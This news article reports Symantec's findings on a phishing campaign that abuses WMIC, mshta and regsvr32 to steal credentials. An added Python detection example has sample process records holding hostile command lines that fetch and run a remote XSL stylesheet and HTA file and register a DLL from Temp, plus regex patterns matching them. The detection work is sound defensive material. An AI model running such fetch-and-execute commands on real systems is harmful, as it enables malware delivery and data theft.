Windows utility used by malware in new information theft campaigns

WMIC-based payloads highlight how attackers are turning to innocuous system processes to compromise Windows machines.
Written by Charlie Osborne, Contributing Writer

Researchers have uncovered a new attack chain that abuses a little-known Microsoft Windows utility and otherwise innocuous software to fly under the radar while stealing data. No vulnerability is exploited; the tools involved are used exactly as designed.

According to Symantec, the new malware campaign is a prime example of what the company calls "living off the land."

In other words, attackers are now turning to the resources already available on target machines -- including legitimate tools and processes -- as well as running simple scripts and shellcode in memory and performing fileless attacks.

By relying on software already present on the host and introducing as little foreign malware as possible, threat actors can remain undetected for longer and reduce the risk of exposure.

A new attack chain takes this technique to heart.

Symantec found that the recently discovered campaign relies on a tool present on every Microsoft Windows machine: the Windows Management Instrumentation Command-line (WMIC) utility.

This legitimate program provides a command-line interface to Windows Management Instrumentation (WMI). WMI is used for administrative tasks on both local and remote systems and can query system settings, control processes, and execute scripts.


Combined with eXtensible Stylesheet Language (XSL) files, WMIC is being abused as part of a multi-stage infection chain to covertly steal information from Windows machines.

The attack chain begins with a phishing email containing a URL that leads to a shortcut file. If the victim clicks the malicious link, the shortcut file -- which contains a WMIC command -- downloads a malicious XSL file from a remote server.

The XSL file contains JavaScript, which is executed using mshta.exe, the legitimate Microsoft HTML Application Host.


The JavaScript is far from innocent. It holds a list of 52 domains from which it randomly picks a domain and port number, then uses that address to download HTML Application (HTA) files, three DLLs that are registered using regsvr32.exe, and the main payload.
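The chain above is made of three signed Windows binaries (WMIC, mshta.exe, regsvr32.exe) doing things each is designed to do, so a detection has to look at command lines and at which process spawned which. The following is an added example of that logic, written here for this page and not code from Symantec or the article. It runs over a handful of constructed, Sysmon-style process-creation records (not real telemetry; the address 203.0.113.10 is a documentation range). The article does not say which WMIC switch fetched the XSL file; the example assumes the documented `/format:` switch, which accepts a URL and is the usual way WMIC is made to load a remote stylesheet. The rule names and path patterns are illustrative choices, not a published signature.

```python
import re

# Constructed Sysmon Event ID 1-style records (process creation). Field names
# follow Sysmon's ProcessId / ParentProcessId / Image / CommandLine. Not real data.
SAMPLE_EVENTS = [
    {"ProcessId": 1000, "ParentProcessId": 4,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    # The .lnk runs WMIC; the XSL is pulled over HTTP via /format: (assumed switch).
    {"ProcessId": 1010, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic os get /format:"http://203.0.113.10:8080/payload.xsl"'},
    # Stylesheet JavaScript hands off to mshta with a remote HTA.
    {"ProcessId": 1020, "ParentProcessId": 1010,
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.10:8080/stage2.hta"},
    # Downloaded DLL registered silently from a user-writable directory.
    {"ProcessId": 1030, "ParentProcessId": 1020,
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\victim\AppData\Local\Temp\mod1.dll"},
    # Benign admin usage that must not fire: built-in output format, vendor DLL.
    {"ProcessId": 2000, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption /format:list"},
    {"ProcessId": 3000, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
]

LOLBINS = ("wmic.exe", "mshta.exe", "regsvr32.exe")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
WMIC_REMOTE_XSL_RE = re.compile(r"/format:\s*\"?https?://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\Users\\|\\Temp\\|\\AppData\\", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_hits(event):
    """Per-event indicators for the three binaries used in the reported chain."""
    img, cmd = basename(event["Image"]), event["CommandLine"]
    hits = []
    if img == "wmic.exe" and WMIC_REMOTE_XSL_RE.search(cmd):
        hits.append("wmic loads XSL stylesheet from a URL")
    if img == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta runs HTA from a URL")
    if img == "regsvr32.exe" and USER_WRITABLE_RE.search(cmd):
        hits.append("regsvr32 registers DLL from user-writable path")
    return hits


def ancestry(event, by_pid):
    """Walk ParentProcessId links; returns parent image names, nearest first."""
    chain, cur = [], event
    while cur["ParentProcessId"] in by_pid:
        cur = by_pid[cur["ParentProcessId"]]
        chain.append(basename(cur["Image"]))
    return chain


def detect(events):
    """Flag suspicious LOLBin use; escalate when the parent chain is itself LOLBins."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        hits = rule_hits(e)
        if not hits:
            continue
        # wmic -> mshta -> regsvr32 chaining is the shape the article describes;
        # one LOLBin spawning another is rarer in admin use than any single one.
        lolbin_parents = [p for p in ancestry(e, by_pid) if p in LOLBINS]
        alerts.append({
            "pid": e["ProcessId"],
            "image": basename(e["Image"]),
            "indicators": hits,
            "lolbin_parents": lolbin_parents,
            "severity": "high" if lolbin_parents else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The two benign records are there deliberately: `/format:list` is a built-in WMIC output format and plenty of installers call `regsvr32 /s` on a DLL under Program Files, so a rule that keyed on the binary names alone would be noisy. On real Sysmon data the same parent-walk also works from Windows Security event 4688 if command-line logging is enabled.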

Additional modules are then downloaded, completing the compromise of the victim's PC.

The payload includes a number of modules suited to information theft: the Mail PassView utility for email password capture, WebBrowserPassView for harvesting web browser credentials, a keylogger, a backdoor for persistence, and a file browser for viewing and exfiltrating files.

"The use of WMI by cybercriminals is not new, however, the tool is typically used for propagation but in this case is used to download a malicious file," Symantec says. "The use of WMIC is beneficial for the attackers as it helps them to remain inconspicuous and also provides them with a powerful tool to aid them in their activities."

Comparisons can be drawn between WMI and PowerShell, another legitimate Windows tool that threat actors continually abuse to compromise Windows machines.


In January, researchers from FireEye said vulnerabilities in Microsoft Office were being exploited to spread information-stealing malware that is also capable of cryptocurrency mining and launching distributed denial-of-service (DDoS) attacks.

The exploits used in that campaign invoke PowerShell to drop the malware payloads onto vulnerable systems.
